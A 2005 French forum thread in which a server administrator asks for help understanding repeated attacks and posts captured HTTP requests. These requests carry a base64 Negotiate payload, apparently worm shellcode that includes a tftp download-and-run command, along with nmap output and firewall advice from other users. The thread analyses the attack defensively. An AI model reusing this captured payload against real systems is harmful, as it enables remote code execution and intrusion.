Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1077 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Attaques sur serveur / recherche explications ...

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Attaques sur serveur / recherche explications ...

n°687788
sneakz
Posté le 03-06-2005 à 18:29:52  profilanswer
 

Je viens de loguer plusieurs attaques identiques sur mon serveur.
 
"Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability"
 
'If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed Authoring and Versioning (WebDAV) search implementation. Hidden directories, include files (*.inc), or other documents that would not normally be accessible through the regular website interface can be exposed through this exploit.'
 
Ces attaques se sont succédées à des intervalles de temps espacés alternativement de 2 minutes puis 4 minutes en provenance d'IP différentes.
 
83.198.205.219:3840
83.198.6.130:1379
83.198.79.154:4783
83.198.87.12:4826
83.198.117.145:3878
83.198.227.128:191
83.198.219.52:3831
83.198.151.134:3852
83.198.6.130:3895
83.198.84.31
83.198.151.83
83.198.107.249
83.198.154.150
83.198.78.123
83.198.8.71
83.198.52.210
83.198.154.150
 
 
Comment l'attaquant as-tu pu réaliser cela ?
1) je ne pense pas qu'il ait pu spoofé les différentes machines
2) je ne pense pas qu'il utilise des proxies (j'ai scanné quelques unes d'entre elles et je n'ai pas vu de trace de proxy)
3) je pense qu'il a utilisé plusieurs machines physique dans un même lieu et cela apparaît également étrange.
4) hypothèse 3 qui ne tient pas la route dans la mesure, où il utilise beaucoup trop d'IP différentes.
5) Il forge certainement des paquets mais auquel cas il n'a pas de retour  
 
Je recherche des explications plausibles ...
 
Merci


Message édité par sneakz le 03-06-2005 à 20:04:42
mood
Publicité
Posté le 03-06-2005 à 18:29:52  profilanswer
 

n°688090
sneakz
Posté le 04-06-2005 à 20:19:36  profilanswer
 

L'intrusion continue ...
 
Une petite analyse des trames reçues (IP source : 83.198.230.251)
83.198.176.184 étant l'adresse du serveur
 
Connexion TCP (syn/syn-ack/ack)
Puis ...
ET / HTTP/1.0\r\n
Host: 83.198.176.184\r\n
Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQY
gOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUoAkEKQQp
BCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxi
LXyAB6+MuSYs0iwHuMcCZrITAdAfByg0Bwuv0
 
etc ..
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQJCQkJCQkJCQ
kJCQkkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
JCQkJCQkJCQkJCQkkJCQkJCQkJCQkJCQkJCQk
JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJ
CQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
 
etc ..
 
Tentative de Buffer Overflow ?

n°688106
tron20
Posté le 04-06-2005 à 21:27:06  profilanswer
 

sneakz a écrit :

Je viens de loguer plusieurs attaques identiques sur mon serveur.
 
"Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability"
 
'If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed Authoring and Versioning (WebDAV) search implementation. Hidden directories, include files (*.inc), or other documents that would not normally be accessible through the regular website interface can be exposed through this exploit.'
 
Ces attaques se sont succédées à des intervalles de temps espacés alternativement de 2 minutes puis 4 minutes en provenance d'IP différentes.
 
83.198.205.219:3840
83.198.6.130:1379
83.198.79.154:4783
83.198.87.12:4826
83.198.117.145:3878
83.198.227.128:191
83.198.219.52:3831
83.198.151.134:3852
83.198.6.130:3895
83.198.84.31
83.198.151.83
83.198.107.249
83.198.154.150
83.198.78.123
83.198.8.71
83.198.52.210
83.198.154.150
 
 
Comment l'attaquant as-tu pu réaliser cela ?
1) je ne pense pas qu'il ait pu spoofé les différentes machines
2) je ne pense pas qu'il utilise des proxies (j'ai scanné quelques unes d'entre elles et je n'ai pas vu de trace de proxy)
3) je pense qu'il a utilisé plusieurs machines physique dans un même lieu et cela apparaît également étrange.
4) hypothèse 3 qui ne tient pas la route dans la mesure, où il utilise beaucoup trop d'IP différentes.
5) Il forge certainement des paquets mais auquel cas il n'a pas de retour  
 
Je recherche des explications plausibles ...
 
Merci


active l'antispoof illico.
tu as quoi comme fw ?

n°688111
l0ky
Posté le 04-06-2005 à 21:31:52  profilanswer
 

L'antispoofing du kernel ne permet pas cet anti-spoofing (du moins si tu parles de rp_filter)...

n°688116
tron20
Posté le 04-06-2005 à 21:42:58  profilanswer
 

l0ky a écrit :

L'antispoofing du kernel ne permet pas cet anti-spoofing (du moins si tu parles de rp_filter)...


c du spoof externe, il te faut un antispoof se basant sur plusieurs param. :
 
- mac adress
- ip adresse,
- numero de sequence
- analyse de la fenetre tcp-ip
 
Sinon ta pile et l'anti-spoof kernel sont aveugles. (en clair il detectes et bloque du spoof sur d'eventuel paquets venant chez toi -entrant par la patte wan donc- ayant une adresse de ton lan)... mais pour les autres spoof (et nbreux types) lui pas connaitre.
 
C pour ça que je n'ai plus la pretention de coder netfilter pour qu'il bloque tout les types de spoof existants ...
j'ai un fw semi pro (zyos derivé d'une xbsd).


Message édité par tron20 le 04-06-2005 à 21:54:34
n°688344
sneakz
Posté le 05-06-2005 à 14:53:01  profilanswer
 

Merci pour les infos complémentaires. Je ne sais pas comment peut fonctionner un anti-spoofing (étrange !! si le paquet est forgé ... ! je vais me documenter pour mieux comprendre le process).
Quant à mon fw, il est rudimentaire via une couche applicative sur mon routeur.
Je suis en train de configurer une machine en tant que pont filtrant avec des règles IPTABLES plus fines que celles du routeur.
 
Ps : (zyos derivé d'une xbsd) --> qu'est-ce ?

n°688578
tron20
Posté le 05-06-2005 à 22:48:27  profilanswer
 

sneakz a écrit :

Merci pour les infos complémentaires. Je ne sais pas comment peut fonctionner un anti-spoofing (étrange !! si le paquet est forgé ... ! je vais me documenter pour mieux comprendre le process).
Quant à mon fw, il est rudimentaire via une couche applicative sur mon routeur.
Je suis en train de configurer une machine en tant que pont filtrant avec des règles IPTABLES plus fines que celles du routeur.
 
Ps : (zyos derivé d'une xbsd) --> qu'est-ce ?


ben deja regles bien les acl du routeur et fais lui faire le nat.
 
l'idée de passer ton pont filtrant est bonne : tu veux faire du bridge (cad no ip, mais en mac)
c une tres bonne methode.
 
ps: zyos , pour les firewall zyxell => cf le zywall 5
 

n°697937
sneakz
Posté le 24-06-2005 à 19:32:22  profilanswer
 

Re.
 
Je ne parviens pas à me détacher de ces requêtes HTTP.
 
A priori, le même individu ou la même organisation.
 
Dans les 10 minutes qui précèdent ce post :
 
3 ip différentes et actives (ping positif)
 
- 83.192.80.156
- 83.198.70.29
- 83.198.204.39
 
Un nmap sur chacune d'elle me renvoie la même sortie (vraissembablement un honeypot)
 
nmap -sS -sV -O -F -PI -T4 83.198.204.39
 
Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2005-06-24 19:18 CEST
Interesting ports on ALille-153-1-25-39.w83-198.abo.wanadoo.fr (83.198.204.39):
(The 1212 ports scanned but not shown below are in state: closed)
PORT     STATE    SERVICE      VERSION
135/tcp  filtered msrpc
139/tcp  open     netbios-ssn
445/tcp  filtered microsoft-ds
1025/tcp open     msrpc        Microsoft Windows msrpc
1720/tcp filtered H.323/Q.931
5000/tcp open     upnp         Microsoft Windows UPnP
Device type: general purpose
Running: Microsoft Windows 95/98/ME|NT/2K/XP
OS details: Microsoft Windows Millennium Edition (Me), Windows 2000 Professional or Advanced Server, or Windows XP
 
Des idées sont les bienvenues !!


Message édité par sneakz le 24-06-2005 à 19:33:44
n°697976
matafan
Posté le 24-06-2005 à 21:07:21  profilanswer
 

http://www.forbiddenweb.org/viewtopic.php?id=33961
 
Essaie decoder le contenu du packet HTTP (base64). Tu apres du padding tu devrais pouvoir voir la commande qu'ils essaient d'executer sur ta machine.

n°697988
sneakz
Posté le 24-06-2005 à 21:42:17  profilanswer
 

merci matafan pour ta contribution.
Le lien semble intéressant. Je vais prendre le temps de l'étudier.

mood
Publicité
Posté le 24-06-2005 à 21:42:17  profilanswer
 

n°698063
sneakz
Posté le 25-06-2005 à 11:05:45  profilanswer
 

J'ai essayé de décoder base64 sur les données qui n'apparaissent pas être du Padding et je ne vois pas apparaître de commandes particulières (ggrrrr).
 
Ci-dessous le contenu des données :
 
FBQQMAI4IMVwOCBAoAkEKQQpBCkEKBxFTy///
86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0i
wHuMcCZrITAdAfByg0Bwuv0O1QkBHXji18kAetmi
wxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADIt
wHK2LaAjpCwAAAItANAV8AAAAi2g8XzH2YFbrD
WjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pI
DauMC4wLjAgR0VUIHd1YW1rb3BzLmV4ZSZzdGF
ydCB3dWFta29wcy5leGUmZXhpdABCE...t.@.z.g.S...
.......Pr.E..U.eP.......OCCDkDggQRAENDQ0Mg8P1/U1
ZXZoHsgACJ5ujtAAAA/zZoCRLWY+j3AAAAiUYI6
KIAAAD/dgRoa9AryujiAAAAiUYM6D8AAAD/dgRo
+pcCTOjNAAAAMdtoEAQAAFP/0InDVot2EInHuRA
EAADzpF4xwFBQUFNQUP9WDItGCGaBxIAAX15b/
+Bg6CMAAACLRCQMjVh8g0M8BYFDKAAQAACB
YygA8P//iwQkg8QUUDHAwzHSZP8yZIkiMdu4kEKQ
QjHJsQKJ3/OvdAND6/OJfhBkjwJYYcNgvyDw/X+LH
4tGCIkHi3/4gcd4AQAAifk5GXQEiwnr+In6OVoEdAW
LugTr9okRiUoExkP9AWHDoQzw/X+LQByLWAiJHo
sAi0AIiUYEw2CLbCQoi0U8i1QFeAHqi0oYi1ogAevjO
EmLNIsB7jH/McD8rDjgdAfBzw0Bx+v0O3wkJHXhi1o
kAetmiwxLi1ocAeuLBIsB6IlEJBxhwggA6/5
 
Je reste bloqué .. (dans les 2 sens du terme) !!

n°698093
sneakz
Posté le 25-06-2005 à 12:59:39  profilanswer
 

Dans l'analyse de la trame avec Ethereal j'ai trouvé ceci :
 
NTLMSSP
            NTLMSSP identifier: `\202\020z\006\006+\006
            NTLM Message Type: Unknown (0x02050501)
            Unrecognized NTLMSSP Message
 
Utile  ?
NTLMSSP : j'ai vu que cela correspondait à NT Lan Manager security service permissions.
 
 
Tiens quelque chose de similaire ici : http://www.usenetlinux.com/t-430981.html


Message édité par sneakz le 25-06-2005 à 15:29:18

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Attaques sur serveur / recherche explications ...

 

Sujets relatifs
[ PKI ] Recherche packages openCA pour debian.[MDK10.1]Serveur mail sur serveur perso
Mandrake 10.1 + hlds (serveur HL counter strike) + shorewalltcpdump - Traffic bizarre sur un serveur...
Que prendre pour se faire un serveur DHCP ?Partitionnement d'un serveur de DB
[Serveur X], DVI et XFree86 (Debian)Serveur DNS
A la recherche d'une ligne de commande ...restreindre l'accès à un serveur ftp via adresse mac
Plus de sujets relatifs à : Attaques sur serveur / recherche explications ...


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR